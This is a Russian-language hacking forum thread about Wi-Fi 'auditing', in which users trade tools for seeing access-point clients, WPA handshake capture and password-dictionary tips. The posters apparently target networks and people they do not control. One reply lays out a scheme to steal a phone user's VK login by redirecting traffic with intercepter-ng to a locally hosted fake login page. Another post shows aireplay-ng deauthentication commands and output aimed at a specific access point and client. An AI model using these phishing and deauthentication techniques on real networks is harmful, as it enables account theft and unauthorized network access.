Аудит беспроводных сетей [Wi-Fi, BT], вопрос-ответ

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Elvis000, 10 Apr 2008.

  1. MLEX2008

    MLEX2008 New Member

    Joined:
    13 Feb 2014
    Messages:
    86
    Likes Received:
    3
    Reputations:
    0
  2. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    900
    Likes Received:
    1,345
    Reputations:
    17
    А есть в природе какой нибудь эксплоит, который через локальную сеть может подрезать пароли от wifi, сохраненные на компьютере?
     
  3. АнтиСерж32

    АнтиСерж32 New Member

    Joined:
    10 Oct 2013
    Messages:
    51
    Likes Received:
    4
    Reputations:
    0
    Сначала почитайте, что делают эксплоиты.
     
  4. utyara

    utyara Member

    Joined:
    10 Nov 2011
    Messages:
    286
    Likes Received:
    35
    Reputations:
    5
    ребята подскажите можно ли посмотреть в windows есть ли на AP клиенты кроме commviev
     
  5. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    301
    Likes Received:
    102
    Reputations:
    0
    Можно.
    1. SoftPerfect WiFi Guard - сайт где можно скачать актуал https://www.softperfect.com/ Сейчас только ей и пользуюсь.
    2. Есть ещё несколько утилит от http://www.nirsoft.net/
    NetworkConnectLog, Wireless Network Watcher... и что-то там ещё.
    Это бесплатные и легко доступные. Показывают клиентов на точке если сам к ней подключен. Клиенты только по WiFi.
    3. MyLanViewer Network - платен. Показывают клиентов на точке если сам к ней подключен. Клиенты по Lan и WiFi.
    Все же CommView - универсальный инструмент - платен. Показывают клиентов на точках, что в округе без подключения к ним. Клиенты по Lan и WiFi. Но,... не со всеми адаптерами работает.
    1, 2, 3 - работают с любыми адаптерами.
     
    #765 SlNik, 13 Mar 2015
    Last edited: 13 Mar 2015
  6. nsin

    nsin Member

    Joined:
    1 Feb 2013
    Messages:
    64
    Likes Received:
    14
    Reputations:
    5
    Без подключения, можно еще этим софтом посмотреть.

    WifiChannelMonitor.
    http://www.nirsoft.net/utils/wifi_channel_monitor.html

    Acrylic WiFi Free (Professional).
    https://www.acrylicwifi.com/ru/продукты-для-безопасности-и-инспекти/сканер-сетей-wi-fi-acrylic-wifi-free/
    https://www.acrylicwifi.com/ru/продукты-для-безопасности-и-инспекти/продвинутый-анализатор-wi-fi-acrylic-wifi-professional/
     
    1 person likes this.
  7. utyara

    utyara Member

    Joined:
    10 Nov 2011
    Messages:
    286
    Likes Received:
    35
    Reputations:
    5
    спасибо acrylic как раз то что нужно
     
  8. FlatL1ne

    FlatL1ne Elder - Старейшина

    Joined:
    5 Oct 2007
    Messages:
    96
    Likes Received:
    27
    Reputations:
    10
    Ситуация, есть точка Wifi к ней подключается телефон на андроиде. Как перехватить сессию ВК или пароли? Как автоматизировать процесс, чтобы не сидеть рядом, есть возможность подключить компьютер к точке по Wifi и Ethernet и оставить его.
     
  9. djamv

    djamv Member

    Joined:
    16 Oct 2012
    Messages:
    129
    Likes Received:
    45
    Reputations:
    0
    На андроиде вк использует токен для авторизации. Пароля в откытом виде ты не получишь
     
    FlatL1ne likes this.
  10. FlatL1ne

    FlatL1ne Elder - Старейшина

    Joined:
    5 Oct 2007
    Messages:
    96
    Likes Received:
    27
    Reputations:
    10
    Что нужно предпринять для получения доступа к странице ВК?
     
  11. djamv

    djamv Member

    Joined:
    16 Oct 2012
    Messages:
    129
    Likes Received:
    45
    Reputations:
    0
    FlatL1ne, вынудить пользователся залогиниться через браузер. В программе intercepter-ng можно переадресовать все запросы к айпишникам вк и сделать переадресацию на фейковый вк который находится на локалхосте. Поднять вэб сервер у себя на машине и положить туда фейковую страницу авторизации вк. т.е у юзера перестанет работать приложение вк и, скорее всего, он попытается войти через браузер. Он пропишет в адресной строке vk.com и попает на нашу фишинговую страницу(фейк), введет логин и пасс, ???, profit.
     
  12. rewyset

    rewyset New Member

    Joined:
    16 May 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ситуация: есть АР но в airodump'е клиентов подключенных по wifi нет(handshake не поймать), что можно попробовать для получения пароля/handshake от АР
     
  13. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    3,301
    Likes Received:
    9,589
    Reputations:
    338
    Если на АР шифрование WPA/WPA2 и отключен WPS - то без клиентов ничего не сделать.
     
    _________________________
    Sega and rewyset like this.
  14. -bI-

    -bI- Member

    Joined:
    25 Aug 2012
    Messages:
    103
    Likes Received:
    11
    Reputations:
    0
    Подбирать пароль при подключении. (Да жестко)
     
  15. Silverlite

    Silverlite Member

    Joined:
    25 May 2015
    Messages:
    37
    Likes Received:
    18
    Reputations:
    0
    Кто нибудь находил пароль из своих словарей содержащий спец символы, в том числе и пробел? если да, то какой максимальной длинны? Меня интересует вопрос статистики. Т.к. в словарях есть куча комбинаций свыше 17 символов и содержащие спецсимволы. Считаю их бесполезными.
     
    Sega likes this.
  16. Sega

    Sega New Member

    Joined:
    3 Jun 2015
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    Не появляется надпись handshake! В чём может быть проблема?
    В заранее Спасибо!
    Code:
    CH  6 ][ Elapsed: 21 mins ][ 2015-06-04 09:02 ][ fixed channel mon0: -1         
                                                                                 
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                 
    34:07:FB:5E:FD:D5    0 100     6944      458    0   6  54e. WPA2 CCMP   PSK  Wifi1
                                                                                 
    BSSID              STATION            PWR   Rate    Lost  Packets  Probes   
                                                                                 
    34:07:FB:5E:FD:D5  18:FE:34:27:9E:4B    0    1e- 1   1064   202807 

    Code:
     sudo aireplay-ng -0 16 -a 34:07:FB:5E:FD:D5 -c 18:FE:34:27:9E:4B mon0 --ignore-negative-one
    09:05:50  Waiting for beacon frame (BSSID: 34:07:FB:5E:FD:D5) on channel -1
    09:05:50  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:51  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:51  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:52  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:53  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:53  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:54  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:54  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:55  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:55  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:56  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:56  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:57  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:58  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:58  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    09:05:59  Sending 64 directed DeAuth. STMAC: [18:FE:34:27:9E:4B] [ 0| 0 ACKs]
    Точку бомбил не однократно делал даже так:
    sudo aireplay-ng -0 5000 -a 34:07:FB:5E:FD: D5 -c 18:FE:34:27:9E:4B mon0 --ignore-negative-one

    Code:
    sudo aireplay-ng -0 10 -a 34:07:FB:5E:FD:D5 -c 94:44:44:F5:D9:49 mon0 --ignore-negative-one
    09:34:30  Waiting for beacon frame (BSSID: 34:07:FB:5E:FD:D5) on channel -1
    09:34:30  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 5|48 ACKs]
    09:34:31  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 4|42 ACKs]
    09:34:32  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 1|37 ACKs]
    09:34:32  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 6|51 ACKs]
    09:34:33  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 5|43 ACKs]
    09:34:33  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|43 ACKs]
    09:34:34  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|47 ACKs]
    09:34:34  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|46 ACKs]
    09:34:35  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|52 ACKs]
    09:34:35  Sending 64 directed DeAuth. STMAC: [94:44:44:F5:D9:49] [ 0|46 ACKs]
     
  17. daemon_mors

    daemon_mors Elder - Старейшина

    Joined:
    12 Feb 2014
    Messages:
    817
    Likes Received:
    7,390
    Reputations:
    12
    Проблема в fixed channel mon0: -1. handshake то наверняка пойман, просто неотображается надпись... Проверить наличие handshak-а в файле можно с помощью:
    aircrack-ng имя_файла.cap
    Ну а вообще, прежде чем переводить карту в monitor mode её необходимо сначала подготовить (как я называю, потушить)...
    ifconfig wlan0 d..n

    гугли...
    ;)
     
    #777 daemon_mors, 5 Jun 2015
    Last edited: 5 Jun 2015
  18. Sega

    Sega New Member

    Joined:
    3 Jun 2015
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    Не могу установить hashcat! )))))=D
    Буду рад если подскажете команды для установки. Apt-get install hashcat - можете даже не писать.
     
  19. Sega

    Sega New Member

    Joined:
    3 Jun 2015
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    fixed channel mon0: -1. Проблема была с Wi Fi адаптером и по этой причине не ловил handshake.
     
  20. daemon_mors

    daemon_mors Elder - Старейшина

    Joined:
    12 Feb 2014
    Messages:
    817
    Likes Received:
    7,390
    Reputations:
    12
    Ну и что была за проблема? Как устранили?
     
Loading...